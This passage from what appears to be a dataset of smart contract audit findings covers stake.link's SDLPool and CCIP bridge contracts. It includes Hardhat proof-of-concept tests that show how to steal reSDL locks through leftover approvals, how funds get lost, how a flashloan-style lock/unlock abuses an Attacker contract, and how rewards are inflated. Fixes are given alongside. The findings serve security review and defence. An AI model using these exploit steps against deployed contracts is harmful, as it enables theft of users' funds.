that received the lock from bridging on the other chain decides to bridge the lock id\\n // back to the original chain\\n await offRamp\\n .connect(signers[6])\\n .executeSingleMessage(\\n ethers.utils.formatBytes32String('messageId'),\\n 77,\\n ethers.utils.defaultAbiCoder.encode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 
'uint64'],\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n ),\\n sdlPoolCCIPController.address,\\n [{ token: sdlToken.address, amount: toEther(25) }]\\n )\\n\\n\\n // Now the victim owns the reSDL lock on the original chain\\n assert.equal(await sdlPool.ownerOf(2), victim)\\n\\n // However, this lockId has the approval that originally the thief set to his alt account and victim do not know that\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief transfers back to his main account the reSDL via his alt account\\n await sdlPool\\n .connect(signers[2])\\n .transferFrom(victim, thief, lockId)\\n\\n // Thief is now the owner of the reSDL\\n assert.equal(await sdlPool.ownerOf(2), thief)\\n })\\n```\\nчWhen bridging a lock between chains, the lock approval should be deleted.\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n \\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n// Add the line below\\n delete tokenApprovals[_lockId];\\n\\n uint256 totalAmount = lock.amount // Add the line below\\n lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] // Add the line below\\n= totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\nчHigh, possibility to steal fundsч```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete 
lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n -Insufficient Gas Limit Specification for Cross-Chain Transfers in _buildCCIPMessage() method. WrappedTokenBridge.sol #210чlowчThe _buildCCIPMessage() function in the WrappedTokenBridge contract does not specify a gasLimit for the execution of the ccipReceive() function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.\\nThe Client.EVM2AnyMessage struct created by _buildCCIPMessage() is used to define the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a gasLimit field in the extraArgs, which is crucial for determining the maximum amount of gas that can be consumed when the ccipReceive() function is called on the destination chain.\\nWithout a specified gasLimit, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. 
This default may not align with the actual gas requirements of the ccipReceive() function, potentially leading to failed transactions or higher-than-expected fees.\\n` function _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount}); tokenAmounts[0] = tokenAmount;\\n```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: \"\",\\n tokenAmounts: tokenAmounts,\\n extraArgs: \"0x\",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n\\n`чTo address the issue of not including a gasLimit in the _transferTokens method, we can take inspiration from the sendMessage() example and modify the _buildCCIPMessage function within the WrappedTokenBridge contract to include a gasLimit in the extraArgs field of the EVM2AnyMessage struct. 
This will ensure that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the ccipReceive() function.\\nfunction _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({ token: address(wrappedToken), amount: _amount }); tokenAmounts[0] = tokenAmount;\\n// // Include a gasLimit in the extraArgs Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({ receiver: abi.encode(_receiver), data: \"\", tokenAmounts: tokenAmounts, extraArgs: Client._argsToBytes( Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false}) // Additional arguments, setting gas limit and non-strict sequencing mode ), feeToken: _feeTokenAddress });\\n```\\nreturn evm2AnyMessage;\\n```\\n\\n}\\nIncludes a gasLimit field, which is set to 200,000 in this example. This value should be adjusted based on the expected gas consumption of the ccipReceive() function on the destination chain. 
By including the gasLimit in the extraArgs, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.чIf the default gas limit is too low, the ccipReceive() function may run out of gas, causing the transaction to fail on the destination chain.\\nWithout a specified gasLimit, the cost of sending a message can vary, making it difficult for users to predict the required fees.\\nIf the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.ч```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: \"\",\\n tokenAmounts: tokenAmounts,\\n extraArgs: \"0x\",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n -Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.чlowч`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.\\nThis can lead to `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerSecondary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.\\nThe `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`, `SDLPoolCCIPControllerPrimary` from `SDLPoolCCIPController` which inherits `Ownable`, and `SDLPoolCCIPControllerSecondary` inherits from SDLPoolCCIPControllerPrimary; and hence inherit `renounceOwnership()` function.\\nThe owner could accidentally (or intentionally) call `renounceOwnership()` which transfers ownership to `address(0)`. This will break numerous functions within each contract referenced that has the `onlyOwner()` modifier assigned. 
Below are a list of those functions:\\n`SDLPoolCCIPControllerPrimary`\\n`setRewardsInitiator()`\\n`setWrappedRewardToken()`\\n`approveRewardTokens()`\\n`removeWhitelistedChain()`\\n`addWhitelistedChain()`\\n`SDLPoolCCIPControllerSecondary`\\n`setExtraArgs()`\\n`WrappedTokenBridge`\\n`recoverTokens()`\\n`transferTokens()`\\n`LinearBoostController`\\n`setMaxLockingDuration()`\\n`setMaxBoost()`\\n`RESDLTokenBridge`.\\n`setExtraArgs()`\\nPOC\\nAdd this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`\\n```\\n it.only('renounce ownership', async () => {\\n console.log(\"Owner before\", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(\"Set max link fee with onlyOwner modifier\", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(\"set max link fee hasn't changed\", await controller.maxLINKFee())\\n // console out the owner\\n console.log(\"Owner after\", await controller.owner())\\n \\n })\\n```\\nчAccidental `renounceOwnership()` call can disrupt key operations in multiple contracts.\\nDisable `renounceOwnership()` if function in the Ownable contract not required.\\n```\\n// Add the line below\\n function renounceOwnership() public override onlyOwner {\\n// Add the line below\\n revert (\"Not allowed\");\\n// Add the line below\\n }\\n```\\nчч```\\n it.only('renounce ownership', async () => {\\n console.log(\"Owner before\", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(\"Set max link fee with onlyOwner modifier\", await controller.maxLINKFee())\\n \\n // 
renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(\"set max link fee hasn't changed\", await controller.maxLINKFee())\\n // console out the owner\\n console.log(\"Owner after\", await controller.owner())\\n \\n })\\n```\\n -No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.чmediumчThere is no way to revoke the approval which given via the approvefunction They may able execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.\\nThe `setApprovalForAll` function allows the owner to approve anyone as the operator.\\n```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n\\nIn the same vein, the `approve` function allows the owner or operator to `approve` anyone to transfer the lock.\\n```\\n function approve(address _to, uint256 _lockId) external {\\n address owner = ownerOf(_lockId);\\n\\n if (_to == owner) revert ApprovalToCurrentOwner(); //@note\\n if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();\\n\\n tokenApprovals[_lockId] = _to;\\n emit Approval(owner, _to, _lockId);\\n }\\n```\\n\\nNote that in the function, lock cannot be approved to the owner (but can be approved to any of the operators), and can be called by the owner/operator (see the `isApprovedForAll` modifier).\\nIf the operator approves himself to the lock, using the `approve` function, and later on, his operator status gets revoked, his lock approval status is not cleared, meaning 
he still has access to the lock.\\nAs an extreme example\\nUser1 owns 5 locks.\\nHe calls the `setApprovalForAll` setting User2 as his operator.\\nUser2 calls the `approve` function on all 5 locks (It succeeds as there's no check preventing this unlike with the lock owner), getting herself both operator approval and token approvals.\\nUser1 revokes User2's operator status.\\nUser2 still has access to the locks and can transfer them.чNo way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.\\nInclude a check to see if the `_to` in the `approve` function is an operator, revert if it is. Or clear an operator's token approvals after revoking his operator status.чUncleared approval, gives access to transfer token.ч```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n -A user can lose funds in `sdlPoolSecondary` if tries to add more sdl tokens to a lock that has been queued to be completely withdrawnчmediumчIn a secondary chain, if a user adds more sdl amount into a lock that he has queued to withdraw all the amount in the same index batch, he will lose the extra amount he deposited\\nThe process to withdraw all the funds from a lock in a primary chain is just by calling withdraw with all the base amount of the lock. At this point the user will get immediately his funds back and the lock will be deleted, hence the owner will be zero address.\\nHowever, in a secondary chain, a user has to queue a withdraw of all the funds and wait for the keeper to send the update to the primary chain to execute the updates and then receive his sdl token back. 
In this period of time when the keeper does not send the update to the primary chain, if a user queues a withdraw of all the lock base amount, he will still own the lock because the withdraw has not been executed, just queued. So the user can still do whatever modification in his lock, for example, increase his lock base amount by calling `transferAndCall()` in the `sdlToken` passing the address of the `sdlSecondaryPool` as argument.\\nIf this happens, when the keeper send the update to the primary chain and the user executes the updates for his lockId, he will lose this extra amount he deposited because it will execute the updates in order, and it will start with the withdraw of all the funds, will delete the ownership (make the zero address as the owner), and then increase the base amount of the lock that now owns the zero address.\\nAnd basically the lockId will be owned by the zero address with base amount as the extra sdl tokens that the user sent.\\nIt is written inside `sdl-pool-secondary.test.ts` because it uses its setup\\n```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n 
ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(\"The user has lost\", sdlLost.toString(), \"sdl tokens\")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n\\nOutput:\\n```\\n SDLPoolSecondary\\nThe user has lost 1000000000000000000000 sdl tokens\\n ✔ PoC user is not able to execute his lock updates (159ms)\\n\\n\\n 1 passing (3s)\\n```\\nчWhen trying to do any action on a lock in a secondary pool, check if the last update queued has not 0 as the base amount. 
Because if it is the case, that would mean that the user queued a withdraw of all funds and he will lose ownership of the lock at the next keeper update.\\n```\\n function _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n ) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n// Add the line below\\n if(lock.amount == 0) revert();\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange // Add the line below\\n=\\n int256(lockUpdate.lock.amount // Add the line below\\n lockUpdate.lock.boostAmount) -\\n int256(lock.amount // Add the line below\\n lock.boostAmount);\\n if (updateNeeded == 0) updateNeeded = 1;\\n\\n emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);\\n }\\n```\\nчHigh, user will lose fundsч```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 
'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(\"The user has lost\", sdlLost.toString(), \"sdl tokens\")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n -Can lock Fund for 1 sec and unlock in same transaction to gain profitчlowчCan lock Fund for 1 sec and unlock in same transaction to gain profit even if it's small amount yet there's no flashloan protection so malicious user can flashloan big amount and sandwich the rebasing upkeep to take advantage of the pool with dividing leads to zero problem to gain profit from pool.This way totalstaked amount can be manupilated. 
Checkupkeep and performUkeep completely user accessible so totalstake amount can change for the favor of malicious user\\n\\n```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n\\n```\\n import { Signer } from 'ethers'\\nimport { assert, expect } from 'chai'\\nimport {\\n toEther,\\n deploy,\\n getAccounts,\\n setupToken,\\n fromEther,\\n deployUpgradeable,\\n} from '../../utils/helpers'\\nimport {\\n ERC677,\\n LinearBoostController,\\n RewardsPool,\\n SDLPoolPrimary,\\n StakingAllowance,\\n Attacker\\n} from '../../../typechain-types'\\nimport { ethers } from 'hardhat'\\nimport { time } from '@nomicfoundation/hardhat-network-helpers'\\n//1 day in seconds// rest of code\\nconst DAY = 86400\\n\\n// parsing Lock struct in contracts// rest of code\\nconst parseLocks = (locks: any) =>\\n locks.map((l: any) => ({\\n amount: fromEther(l.amount),\\n //show 4 digits after decimal// rest of code\\n boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),\\n startTime: l.startTime.toNumber(),\\n duration: l.duration.toNumber(),\\n expiry: l.expiry.toNumber(),\\n }))\\n\\n const parseData=(data:any)=>({\\n operator:data.operator,\\n from:data.from,\\n tokenId:data.tokenId,\\n data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')\\n })\\n\\ndescribe('SDLPoolPrimary', () => {\\n let sdlToken: StakingAllowance\\n let rewardToken: ERC677\\n let rewardsPool: RewardsPool\\n let boostController: LinearBoostController\\n let sdlPool: SDLPoolPrimary\\n let signers: Signer[]\\n let accounts: string[]\\n let attacker:Attacker\\n before(async () => {\\n ;({ signers, accounts } = await getAccounts())\\n })\\n\\n beforeEach(async () => {\\n sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance\\n rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677\\n\\n await sdlToken.mint(accounts[0], toEther(1000000))\\n await setupToken(sdlToken, accounts)\\n\\n boostController 
= (await deploy('LinearBoostController', [\\n 4 * 365 * DAY,\\n 4,\\n ])) as LinearBoostController\\n\\n sdlPool = (await deployUpgradeable('SDLPoolPrimary', [\\n 'Reward Escrowed SDL',\\n 'reSDL',\\n sdlToken.address,\\n boostController.address,\\n ])) as SDLPoolPrimary\\n\\n rewardsPool = (await deploy('RewardsPool', [\\n sdlPool.address,\\n rewardToken.address,\\n ])) as RewardsPool\\n\\n await sdlPool.addToken(rewardToken.address, rewardsPool.address)\\n await sdlPool.setCCIPController(accounts[0])\\n //attack contract deployment -- setting bridge contract to same we wont need ccip here\\n attacker=await deploy(\"Attacker\",[sdlPool.address,sdlPool.address,sdlToken.address]) as Attacker\\n await sdlToken.transfer(attacker.address,toEther(20000))\\n const sender = signers[0] // or choose any unlocked account\\n const valueToSend = ethers.utils.parseEther(\"100\") // Amount of Ether to send\\n const tx = await sender.sendTransaction({\\n to: attacker.address,\\n value: valueToSend,\\n });\\n \\n await tx.wait();\\n console.log(\"Funded contract!\");\\n })\\n it('should be able to lock an existing stake', async () => {\\n //with flashloan this may prove fatal// rest of code\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(10000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n await sdlPool.extendLockDuration(1, 365 * DAY)\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)\\n assert.equal(fromEther(await sdlPool.totalStaked()), 200)\\n assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)\\n assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)\\n assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [\\n { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },\\n ])\\n\\n // Move one block forward\\n //await ethers.provider.send('evm_mine', 
[]);\\n //console.log(\"Parsed lock :\",parseLocks(await sdlPool.getLocks([1])))\\n })\\n //@audit NFT onERC721receiver doesnt work it seems..\\n it('usage of Attack contract and receiving NFT', async () => {\\n console.log(\"Block-number before tx:\",await ethers.provider.getBlockNumber())\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n // Move one block forward\\n await ethers.provider.send('evm_mine', [ts+1]);\\n console.log(\"SDLToken balance Before:\",await sdlToken.balanceOf(attacker.address))\\n await attacker.attackTransfernCall()\\n console.log(\"Lock\",parseLocks(await sdlPool.getLocks([1])))\\n console.log(\"Block-number after tx:\",await ethers.provider.getBlockNumber())\\n console.log(\"Nft received ??:\",await attacker.received());\\n//boostAmount: 0.0006341958 20_000 -> with flashloan\\n//boostAmount: 0.000006342 200 \\n })\\n})\\n```\\nчSetting lower-limit of locking time to stop bypassing 1 transaction lock-unlock-withdraw .This way it might stop the flashloan attacks too. Preferable minimum 1 day.чLoss of pool reward gained by rebasing.ч```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n -Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chainчmediumчUsers with existing reSDL NFTs on secondary chains (prior to a decrease in maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).\\nConsider the scenario in which the stake.link team is decreasing the `maxBoost` value of the `LinearBoostController` so that newer depositors will get less rewards than OG depositors. 
This will allow an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:\\nWe will assume for simplicity that the starting values for the `LinearBoostController` contract is a maxBoost=10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain which has amount=100_000 and lockingDuration= 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.\\nThen, the stake.link team decreases `maxBoost` to 5. Following this, the attacker will first call `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, which is defined as follows:\\n```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n\\nAs part of this function call, `_updateLock` is triggered to perform this update, which is defined as follows:\\n```\\nfunction _updateLock(\\n Lock memory _lock,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal view returns (Lock memory) {\\n if ((_lock.expiry == 0 || _lock.expiry > block.timestamp) && _lockingDuration < _lock.duration) {\\n revert InvalidLockingDuration();\\n }\\n\\n Lock memory lock = Lock(_lock.amount, _lock.boostAmount, _lock.startTime, _lock.duration, _lock.expiry);\\n\\n uint256 baseAmount = _lock.amount + _amount;\\n uint256 boostAmount = boostController.getBoostAmount(baseAmount, _lockingDuration);\\n\\n // rest of 
code\\n lock.boostAmount = boostAmount;\\n // rest of code\\n}\\n```\\n\\nMost important to note here is that (1) since the `_lockingDuration` of 9_999 is greater than the existing duration of 5_000, this call will succeed, and (2) the `boostAmount` is recalculated now using the new `maxBoost` value of 5. We can calculate the new attacker's `boostAmount` to be: 100_000 * 5 * 9_9999/10_000 = 499_950. Since this value is less than the previous 500_000, `queuedRESDLSupplyChange` in the `_queueLockUpdate` call will be decremented by 50.\\nAfter the `SDLPoolSecondary:extendLockDuration` function call is complete, this update will be queued. At some point an update to this secondary SDL pool will be triggered & once that's complete, the attacker will then be able to execute this update. To do so, the attacker calls `executeQueuedOperations`, specifying their reNFT, which then triggers `_executeQueuedLockUpdates` which has the following logic:\\n```\\n// rest of code\\nuint256 numUpdates = queuedLockUpdates[lockId].length;\\n\\nLock memory curLockState = locks[lockId];\\nuint256 j = 0;\\nwhile (j < numUpdates) {\\n if (queuedLockUpdates[lockId][j].updateBatchIndex > finalizedBatchIndex) break;\\n\\n Lock memory updateLockState = queuedLockUpdates[lockId][j].lock;\\n int256 baseAmountDiff = int256(updateLockState.amount) - int256(curLockState.amount);\\n int256 boostAmountDiff = int256(updateLockState.boostAmount) - int256(curLockState.boostAmount);\\n\\n if (baseAmountDiff < 0) {\\n // rest of code\\n } else if (boostAmountDiff < 0) {\\n locks[lockId].expiry = updateLockState.expiry;\\n locks[lockId].boostAmount = 0;\\n emit InitiateUnlock(_owner, lockId, updateLockState.expiry);\\n } else {\\n // rest of code\\n }\\n // rest of code\\n}\\n// rest of code\\n```\\n\\nRecall that the attacker only has a single update, with the only difference being the decrease of 50 for the `boostAmount`. 
This will trigger the logic based on the `boostAmountDiff < 0` statement which will set `locks[lockId].boostAmount = 0`. This is clearly incorrect logic & will allow the attacker to then fraudulently increase `queuedRESDLSupplyChange`, which will ultimately lead to more rewards going to this secondary chain.\\nContinuing this attack, the attacker will again call `SDLPoolSecondary:extendLockDuration`, but this time with a `_lockingDuration` of 10_000. Referencing the same code snippet as earlier, in `_updateLock`, `boostAmount` is now being calculated as: 100_000 * 5 * 10_000/10_000 = 500_000. In `_queueLockUpdate`, `queuedRESDLSupplyChange` is calculated to be: (100_000 + 500_000) - (100_000 + 0) = 500_000, based on this equation:\\n```\\nqueuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n```\\n\\nRecall that this value of 0 comes from the improper logic in the `_executeQueuedLockUpdates` function call. Ultimately, in aggregate, `queuedRESDLSupplyChange` has been increased by 500_000 - 50 = 499_950. Had the attacker simply increased their locking duration to the max value of 10_000 after the update, there would be 0 change in the `queuedRESDLSupplyChange`.\\nThe fundamental bug here is that post a decrease in `maxBoost`, the update logic allows all existing reSDL NFTs to be able to increase `queuedRESDLSupplyChange` more than should be possible, & `queuedRESDLSupplyChange` is a major factor in terms of the percentage of rewards going to a given secondary chain.чThe `_executeQueuedLockUpdates` function implicitly assumes if there's a decrease in `boostAmountDiff` then the lock update comes from calling `initiateUnlock`. 
There needs to be an additional case to handle this scenario due to a decrease in the `maxBoost`.чUsers with existing reSDL NFTs on secondary chains (prior to a decrease in the maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain.ч```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n -Updates from the `secondary pool` to the `primary pool` may not be sent because there are `no rewards` for the secondary poolчlowчThe SDLPoolCCIPControllerSecondary::performUpkeep() function is only available when there is a `message of rewards` from the `SDLPoolCCIPControllerPrimary`. That could be a problem if there are no rewards to distribute in a specific `secondary chain`, meaning that queued updates from the `secondary chain` will not be reported to the `SDLPoolPrimary`.\\nThe `secondary chain` informs the `primary chain` of the new `numNewRESDLTokens` and `totalRESDLSupplyChange` using the SDLPoolCCIPControllerSecondary::performUpkeep function, then the `primary chain` receives the information and it calculates the new mintStartIndex. 
Note that the `primary chain` increments the `reSDLSupplyByChain` in the `code line 300`, this so that the `primary chain` has the information on how much supply of reSDL tokens there is in the secondary chain:\\n```\\nFile: SDLPoolCCIPControllerPrimary.sol\\n function _ccipReceive(Client.Any2EVMMessage memory _message) internal override {\\n uint64 sourceChainSelector = _message.sourceChainSelector;\\n\\n (uint256 numNewRESDLTokens, int256 totalRESDLSupplyChange) = abi.decode(_message.data, (uint256, int256));\\n\\n if (totalRESDLSupplyChange > 0) {\\n reSDLSupplyByChain[sourceChainSelector] += uint256(totalRESDLSupplyChange);\\n } else if (totalRESDLSupplyChange < 0) {\\n reSDLSupplyByChain[sourceChainSelector] -= uint256(-1 * totalRESDLSupplyChange);\\n }\\n\\n uint256 mintStartIndex = ISDLPoolPrimary(sdlPool).handleIncomingUpdate(numNewRESDLTokens, totalRESDLSupplyChange);\\n\\n _ccipSendUpdate(sourceChainSelector, mintStartIndex);\\n\\n emit MessageReceived(_message.messageId, sourceChainSelector);\\n }\\n```\\n\\nNow the mintStartIndex is send to the secondary chain code line 307 and the secondary chain receives the new mintStartIndex. 
